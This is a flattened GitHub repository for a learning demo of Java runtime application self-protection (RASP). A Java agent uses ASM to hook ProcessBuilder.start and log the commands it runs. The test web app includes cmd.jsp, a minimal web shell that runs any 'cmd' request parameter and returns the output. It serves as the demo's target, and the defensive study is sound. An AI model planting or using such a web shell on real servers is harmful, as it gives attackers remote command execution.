├── Rasp_Demo
├── Agent
│ ├── target
│ │ ├── maven-status
│ │ │ └── maven-compiler-plugin
│ │ │ │ ├── testCompile
│ │ │ │ └── default-testCompile
│ │ │ │ │ └── inputFiles.lst
│ │ │ │ └── compile
│ │ │ │ └── default-compile
│ │ │ │ ├── createdFiles.lst
│ │ │ │ └── inputFiles.lst
│ │ ├── agent.jar
│ │ ├── original-agent.jar
│ │ ├── classes
│ │ │ ├── org
│ │ │ │ └── example
│ │ │ │ │ ├── Agent.class
│ │ │ │ │ ├── ClassUtils.class
│ │ │ │ │ ├── AgentTransform.class
│ │ │ │ │ ├── TestClassVisitor.class
│ │ │ │ │ ├── ProcessBuilderHook.class
│ │ │ │ │ └── TestClassVisitor$1.class
│ │ │ └── MANIFEST.MF
│ │ └── maven-archiver
│ │ │ └── pom.properties
│ ├── src
│ │ └── main
│ │ │ ├── resources
│ │ │ └── MANIFEST.MF
│ │ │ └── java
│ │ │ └── org
│ │ │ └── example
│ │ │ ├── Agent.java
│ │ │ ├── ProcessBuilderHook.java
│ │ │ ├── ClassUtils.java
│ │ │ ├── TestClassVisitor.java
│ │ │ └── AgentTransform.java
│ ├── dependency-reduced-pom.xml
│ └── pom.xml
├── Test
│ ├── target
│ │ └── classes
│ │ │ └── org
│ │ │ └── example
│ │ │ └── HelloServlet.class
│ ├── web
│ │ ├── index.jsp
│ │ ├── cmd.jsp
│ │ └── WEB-INF
│ │ │ └── web.xml
│ ├── src
│ │ └── main
│ │ │ └── java
│ │ │ └── org
│ │ │ └── example
│ │ │ └── HelloServlet.java
│ └── pom.xml
├── Test.iml
└── pom.xml
└── README.md
/Rasp_Demo/Agent/target/maven-status/maven-compiler-plugin/testCompile/default-testCompile/inputFiles.lst:
--------------------------------------------------------------------------------
1 |
--------------------------------------------------------------------------------
/Rasp_Demo/Agent/target/agent.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ffkkaq/Java_Rasp_Demo/HEAD/Rasp_Demo/Agent/target/agent.jar
--------------------------------------------------------------------------------
/Rasp_Demo/Agent/target/original-agent.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ffkkaq/Java_Rasp_Demo/HEAD/Rasp_Demo/Agent/target/original-agent.jar
--------------------------------------------------------------------------------
/Rasp_Demo/Agent/target/classes/org/example/Agent.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ffkkaq/Java_Rasp_Demo/HEAD/Rasp_Demo/Agent/target/classes/org/example/Agent.class
--------------------------------------------------------------------------------
/Rasp_Demo/Agent/target/classes/org/example/ClassUtils.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ffkkaq/Java_Rasp_Demo/HEAD/Rasp_Demo/Agent/target/classes/org/example/ClassUtils.class
--------------------------------------------------------------------------------
/Rasp_Demo/Test/target/classes/org/example/HelloServlet.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ffkkaq/Java_Rasp_Demo/HEAD/Rasp_Demo/Test/target/classes/org/example/HelloServlet.class
--------------------------------------------------------------------------------
/Rasp_Demo/Agent/target/classes/org/example/AgentTransform.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ffkkaq/Java_Rasp_Demo/HEAD/Rasp_Demo/Agent/target/classes/org/example/AgentTransform.class
--------------------------------------------------------------------------------
/Rasp_Demo/Agent/target/maven-archiver/pom.properties:
--------------------------------------------------------------------------------
1 | #Generated by Maven
2 | #Wed Mar 08 22:03:51 CST 2023
3 | version=1.0.0
4 | groupId=cn.org.javaweb
5 | artifactId=agent
6 |
--------------------------------------------------------------------------------
/Rasp_Demo/Agent/target/classes/org/example/TestClassVisitor.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ffkkaq/Java_Rasp_Demo/HEAD/Rasp_Demo/Agent/target/classes/org/example/TestClassVisitor.class
--------------------------------------------------------------------------------
/Rasp_Demo/Agent/target/classes/org/example/ProcessBuilderHook.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ffkkaq/Java_Rasp_Demo/HEAD/Rasp_Demo/Agent/target/classes/org/example/ProcessBuilderHook.class
--------------------------------------------------------------------------------
/Rasp_Demo/Agent/target/classes/org/example/TestClassVisitor$1.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ffkkaq/Java_Rasp_Demo/HEAD/Rasp_Demo/Agent/target/classes/org/example/TestClassVisitor$1.class
--------------------------------------------------------------------------------
/Rasp_Demo/Agent/src/main/resources/MANIFEST.MF:
--------------------------------------------------------------------------------
1 | Manifest-Version: 1.0
2 | Premain-Class: org.example.Agent
3 | Can-Retransform-Classes: true
4 | Can-Redefine-Classes: true
5 | Can-Set-Native-Method-Prefix: true
6 |
--------------------------------------------------------------------------------
/Rasp_Demo/Agent/target/classes/MANIFEST.MF:
--------------------------------------------------------------------------------
1 | Manifest-Version: 1.0
2 | Premain-Class: org.example.Agent
3 | Can-Retransform-Classes: true
4 | Can-Redefine-Classes: true
5 | Can-Set-Native-Method-Prefix: true
6 |
--------------------------------------------------------------------------------
/Rasp_Demo/Agent/target/maven-status/maven-compiler-plugin/compile/default-compile/createdFiles.lst:
--------------------------------------------------------------------------------
1 | org\example\Agent.class
2 | org\example\AgentTransform.class
3 | org\example\TestClassVisitor$1.class
4 | org\example\TestClassVisitor.class
5 | org\example\ProcessBuilderHook.class
6 | org\example\ClassUtils.class
7 |
--------------------------------------------------------------------------------
/Rasp_Demo/Agent/src/main/java/org/example/Agent.java:
--------------------------------------------------------------------------------
1 | package org.example;
2 |
3 |
4 | import java.lang.instrument.Instrumentation;
5 | /**
6 | * @author gk0d
7 | */
8 | public class Agent {
9 |
10 | public static void premain(String agentArgs, Instrumentation inst) {
11 | inst.addTransformer(new AgentTransform());
12 | }
13 | }
--------------------------------------------------------------------------------
/Rasp_Demo/Test/web/index.jsp:
--------------------------------------------------------------------------------
1 | <%--
2 | Created by IntelliJ IDEA.
3 | User: shiwk
4 | Date: 2023/3/8
5 | Time: 17:32
6 | To change this template use File | Settings | File Templates.
7 | --%>
8 | <%@ page contentType="text/html;charset=UTF-8" language="java" %>
9 |
10 |
11 | gk0d
12 |
13 |
14 | aadaddddddd
15 |
16 |
17 |
--------------------------------------------------------------------------------
/Rasp_Demo/Agent/target/maven-status/maven-compiler-plugin/compile/default-compile/inputFiles.lst:
--------------------------------------------------------------------------------
1 | D:\vul\Rasp_Demo\Agent\src\main\java\org\example\TestClassVisitor.java
2 | D:\vul\Rasp_Demo\Agent\src\main\java\org\example\Agent.java
3 | D:\vul\Rasp_Demo\Agent\src\main\java\org\example\ClassUtils.java
4 | D:\vul\Rasp_Demo\Agent\src\main\java\org\example\AgentTransform.java
5 | D:\vul\Rasp_Demo\Agent\src\main\java\org\example\ProcessBuilderHook.java
6 |
--------------------------------------------------------------------------------
/Rasp_Demo/Test/web/cmd.jsp:
--------------------------------------------------------------------------------
1 | <%@ page import="java.io.InputStream" %>
2 | <%@ page contentType="text/html;charset=UTF-8" language="java" %>
3 |
4 | <%
5 | Process process = Runtime.getRuntime().exec(request.getParameter("cmd"));
6 | InputStream in = process.getInputStream();
7 | int a = 0;
8 | byte[] b = new byte[1024];
9 |
10 | while ((a = in.read(b)) != -1) {
11 | out.println(new String(b, 0, a));
12 | }
13 |
14 | in.close();
15 | %>
16 |
--------------------------------------------------------------------------------
/Rasp_Demo/Test/src/main/java/org/example/HelloServlet.java:
--------------------------------------------------------------------------------
1 | package org.example;
2 |
3 | import javax.servlet.ServletException;
4 | import javax.servlet.http.HttpServlet;
5 | import javax.servlet.http.HttpServletRequest;
6 | import javax.servlet.http.HttpServletResponse;
7 | import java.io.IOException;
8 |
9 | public class HelloServlet extends HttpServlet {
10 |
11 | protected void doGet(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException, IOException {
12 | doPost(request, response);
13 | }
14 | }
15 |
--------------------------------------------------------------------------------
/Rasp_Demo/Agent/src/main/java/org/example/ProcessBuilderHook.java:
--------------------------------------------------------------------------------
1 | package org.example;
2 |
3 | import java.util.Arrays;
4 | import java.util.LinkedList;
5 | import java.util.List;
6 |
7 | /**
8 | * @author gk0d
9 | */
10 | public class ProcessBuilderHook {
11 |
12 | public static boolean start(List commands) {
13 | String[] commandArr = commands.toArray(new String[commands.size()]);
14 | System.out.println(Arrays.toString(commandArr));
15 | ClassUtils.printStackTrace();
16 | return false;
17 |
18 | }
19 | }
20 |
--------------------------------------------------------------------------------
/Rasp_Demo/Agent/src/main/java/org/example/ClassUtils.java:
--------------------------------------------------------------------------------
1 | package org.example;
2 |
3 | /**
4 | * @author gk0d
5 | */
6 | public class ClassUtils {
7 |
8 | /**
9 | * 打印调用链信息
10 | */
11 | public static void printStackTrace() {
12 | StackTraceElement[] elements = Thread.currentThread().getStackTrace();
13 |
14 | for (StackTraceElement element : elements) {
15 | System.err.println(element);
16 | }
17 |
18 | System.err.println("--------------------------------------------------------------------------");
19 | }
20 |
21 | }
22 |
--------------------------------------------------------------------------------
/Rasp_Demo/Test.iml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
9 |
10 |
11 |
12 |
13 |
14 |
15 |
16 |
17 |
18 |
19 |
--------------------------------------------------------------------------------
/Rasp_Demo/pom.xml:
--------------------------------------------------------------------------------
1 |
2 |
5 | 4.0.0
6 |
7 | org.example
8 | Rasp_Demo
9 | pom
10 | 1.0-SNAPSHOT
11 |
12 | Agent
13 | Test
14 |
15 |
16 |
17 | 8
18 | 8
19 | UTF-8
20 |
21 |
22 |
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # Java_Rasp_Demo
2 |
3 | 学习过程中实现的简单的Java的Rasp,仅供学习参考,应该先具有Java `Instrumentation`与`ASM`技术的基础
4 | 关于这个Demo具体的细节可以参考:http://www.gk0d.top/note/rasp%E5%AD%A6%E4%B9%A0/
5 |
6 | # 关于Rasp的资料
7 |
8 | https://paper.seebug.org/1041/ //百度OpenRasp浅析
9 |
10 | https://paper.seebug.org/513/ //OpenRasp浅析
11 |
12 | https://paper.seebug.org/449/ //一类PHP RASP实现
13 |
14 | https://paper.seebug.org/330/ //Rasp 技术介绍与实现
15 |
16 | ---
17 |
18 | https://t0data.github.io/2019/08/29/rasp-agent-technology/ //
19 |
20 |
21 |
22 | https://xz.aliyun.com/t/11803 //OpenRasp浅析
23 |
24 | https://xz.aliyun.com/t/8148 //以OpenRASP为基础-展开来港港RASP的类加载
25 |
26 | https://xz.aliyun.com/t/7316 //从0开始的PHP RASP的学习
27 |
28 | https://xz.aliyun.com/t/7005 //Java底层防护 - OpenRASP核心源码浅析
29 |
30 | https://xz.aliyun.com/t/4903 //浅谈RASP技术攻防之实战
31 |
32 | https://security.tencent.com/index.php/blog/msg/166 //RASP攻防 —— RASP安全应用与局限性浅析
33 |
--------------------------------------------------------------------------------
/Rasp_Demo/Test/web/WEB-INF/web.xml:
--------------------------------------------------------------------------------
1 |
2 |
6 |
7 |
8 | hello
9 |
10 | org.example.HelloServlet
11 |
12 |
13 |
14 | hello
15 | /hello
16 |
17 |
18 | cmd
19 | org.example.CmdServlet
20 |
21 |
22 | cmd
23 | /cmd
24 |
25 |
26 |
27 |
--------------------------------------------------------------------------------
/Rasp_Demo/Test/pom.xml:
--------------------------------------------------------------------------------
1 |
2 |
5 |
6 | Rasp_Demo
7 | org.example
8 | 1.0-SNAPSHOT
9 |
10 | 4.0.0
11 |
12 | Test
13 |
14 |
15 | 8
16 | 8
17 | UTF-8
18 |
19 |
20 |
21 |
22 | javax.servlet
23 | javax.servlet-api
24 | 4.0.1
25 | provided
26 |
27 |
28 |
29 | javax.servlet.jsp
30 | javax.servlet.jsp-api
31 | 2.2.1
32 | provided
33 |
34 |
35 |
36 |
37 |
--------------------------------------------------------------------------------
/Rasp_Demo/Agent/src/main/java/org/example/TestClassVisitor.java:
--------------------------------------------------------------------------------
1 | package org.example;
2 |
3 | import org.objectweb.asm.ClassVisitor;
4 | import org.objectweb.asm.Label;
5 | import org.objectweb.asm.MethodVisitor;
6 | import org.objectweb.asm.Opcodes;
7 | import org.objectweb.asm.commons.AdviceAdapter;
8 |
9 |
10 | /**
11 | * @author gk0d
12 | */
13 | public class TestClassVisitor extends ClassVisitor implements Opcodes {
14 |
15 | public TestClassVisitor(ClassVisitor cv) {
16 | super(Opcodes.ASM5, cv);
17 | }
18 |
19 | @Override
20 | public MethodVisitor visitMethod(int access, String name, String desc, String signature, String[] exceptions) {
21 | MethodVisitor mv = super.visitMethod(access, name, desc, signature, exceptions);
22 |
23 | if ("start".equals(name) && "()Ljava/lang/Process;".equals(desc)) {
24 | System.out.println(name + "--------" + desc);
25 |
26 | return new AdviceAdapter(Opcodes.ASM5, mv, access, name, desc) {
27 | @Override
28 | public void visitCode() {
29 |
30 | mv.visitVarInsn(ALOAD, 0);
31 | mv.visitFieldInsn(GETFIELD, "java/lang/ProcessBuilder", "command", "Ljava/util/List;");
32 | mv.visitMethodInsn(INVOKESTATIC, "org/example/ProcessBuilderHook", "start", "(Ljava/util/List;)Z", false);
33 | Label l1 = new Label();
34 | mv.visitLabel(l1);
35 | super.visitCode();
36 |
37 | }
38 | };
39 | }
40 | return mv;
41 | }
42 | }
43 |
--------------------------------------------------------------------------------
/Rasp_Demo/Agent/src/main/java/org/example/AgentTransform.java:
--------------------------------------------------------------------------------
1 | package org.example;
2 |
3 | /**
4 | * @author gk0d
5 | */
6 | import org.objectweb.asm.*;
7 | import java.lang.instrument.ClassFileTransformer;
8 | import java.lang.instrument.IllegalClassFormatException;
9 | import java.security.ProtectionDomain;
10 | public class AgentTransform implements ClassFileTransformer {
11 |
12 | /**
13 | * @param loader
14 | * @param className
15 | * @param classBeingRedefined
16 | * @param protectionDomain
17 | * @param classfileBuffer
18 | * @return
19 | * @throws IllegalClassFormatException
20 | */
21 | @Override
22 | public byte[] transform(ClassLoader loader, String className,
23 | Class classBeingRedefined, ProtectionDomain protectionDomain,
24 | byte[] classfileBuffer) throws IllegalClassFormatException {
25 |
26 | className = className.replace("/", ".");
27 |
28 | try {
29 | if (className.contains("ProcessBuilder")) {
30 | System.out.println("Load class: " + className);
31 |
32 | ClassReader classReader = new ClassReader(classfileBuffer);
33 | ClassWriter classWriter = new ClassWriter(classReader, ClassWriter.COMPUTE_MAXS);
34 | ClassVisitor classVisitor = new TestClassVisitor(classWriter);
35 |
36 | classReader.accept(classVisitor, ClassReader.EXPAND_FRAMES);
37 |
38 | classfileBuffer = classWriter.toByteArray();
39 | }
40 | } catch (Exception e) {
41 | e.printStackTrace();
42 | }
43 | return classfileBuffer;
44 | }
45 |
46 | }
47 |
48 |
--------------------------------------------------------------------------------
/Rasp_Demo/Agent/dependency-reduced-pom.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 | spring-boot-starter-parent
5 | org.springframework.boot
6 | 2.1.3.RELEASE
7 | pom.xml
8 |
9 | 4.0.0
10 | cn.org.javaweb
11 | agent
12 | agent
13 | 1.0.0
14 | Agent Demo
15 |
16 | agent
17 |
18 |
19 | maven-compiler-plugin
20 |
21 | 1.6
22 | 1.6
23 |
24 |
25 |
26 | maven-jar-plugin
27 | 2.3.2
28 |
29 |
30 | src/main/resources/MANIFEST.MF
31 |
32 |
33 |
34 |
35 | maven-shade-plugin
36 | 2.3
37 |
38 |
39 | package
40 |
41 | shade
42 |
43 |
44 |
45 |
46 | commons-io:commons-io:jar:*
47 | org.ow2.asm:asm-all:jar:*
48 |
49 |
50 |
51 |
52 |
53 |
54 |
55 | maven-surefire-plugin
56 | 2.21.0
57 |
58 | true
59 |
60 |
61 |
62 |
63 |
64 |
65 | org.ow2.asm
66 | asm-all
67 | 5.1
68 | provided
69 |
70 |
71 | commons-io
72 | commons-io
73 | 2.2
74 | provided
75 |
76 |
77 | javax.servlet
78 | javax.servlet-api
79 | 3.1.0
80 | provided
81 |
82 |
83 |
84 | 1.8
85 |
86 |
87 |
88 |
--------------------------------------------------------------------------------
/Rasp_Demo/Agent/pom.xml:
--------------------------------------------------------------------------------
1 |
2 |
4 | 4.0.0
5 |
6 | org.springframework.boot
7 | spring-boot-starter-parent
8 | 2.1.3.RELEASE
9 |
10 |
11 | cn.org.javaweb
12 | agent
13 | 1.0.0
14 | agent
15 | Agent Demo
16 |
17 |
18 | 1.8
19 |
20 |
21 |
22 |
23 |
24 | org.ow2.asm
25 | asm-all
26 | 5.1
27 |
28 |
29 | commons-io
30 | commons-io
31 | 2.2
32 |
33 |
34 | javax.servlet
35 | javax.servlet-api
36 | 3.1.0
37 | provided
38 |
39 |
40 |
41 |
42 |
43 | agent
44 |
45 |
46 | org.apache.maven.plugins
47 | maven-compiler-plugin
48 |
49 | 1.6
50 | 1.6
51 |
52 |
53 |
54 | org.apache.maven.plugins
55 | maven-jar-plugin
56 | 2.3.2
57 |
58 |
59 | src/main/resources/MANIFEST.MF
60 |
61 |
62 |
63 |
64 | org.apache.maven.plugins
65 | maven-shade-plugin
66 | 2.3
67 |
68 |
69 | package
70 |
71 | shade
72 |
73 |
74 |
75 |
76 | commons-io:commons-io:jar:*
77 | org.ow2.asm:asm-all:jar:*
78 |
79 |
80 |
81 |
82 |
83 |
84 |
85 | org.apache.maven.plugins
86 | maven-surefire-plugin
87 | 2.21.0
88 |
89 | true
90 |
91 |
92 |
93 |
94 |
95 |
96 |
--------------------------------------------------------------------------------